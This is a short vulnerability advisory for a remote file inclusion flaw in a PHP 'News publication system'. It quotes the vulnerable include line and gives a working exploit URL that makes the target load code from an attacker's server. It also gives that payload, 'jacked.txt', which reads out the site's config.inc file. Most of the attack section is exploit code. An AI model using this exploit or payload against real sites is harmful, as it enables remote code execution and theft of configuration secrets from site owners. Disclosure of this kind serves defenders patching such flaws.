News publication system remote File include

2006.11.10
Credit: navairum
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Software: News publication system -------------------------------- Description: News publication system provides a mechanism for news blocks publication on site in conformity with rules and templates set. Provides a mechanism for adding news to the system and news management. Provides a mechanism for system management functions access control. ------------------------------------ Site: http://sourceforge.net/project/showfiles.php?group_id=27445 ----------------------------------------------------------- The variable $path in class.Database.php isn't defined before it is included. Register_Globals must be on. Vulnerable Code: if ($path!="") include $path."config.inc"; else include "../config.inc"; ----------------------------- Exploit http://[SITE]/newsp/lib/class.Database.php?path=http://[your server]/jacked.txt? ------------------------------ Jacked.txt <?php $file='../config.inc'; $handle=fopen($file,'r'); while(!feof($handle)) { if($handle) { $data = fgets($handle,filesize($file)); $data.='<br>'; } else { echo 'handle failed'; } echo $data; } exit(0); ?> Navairum legalize it


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top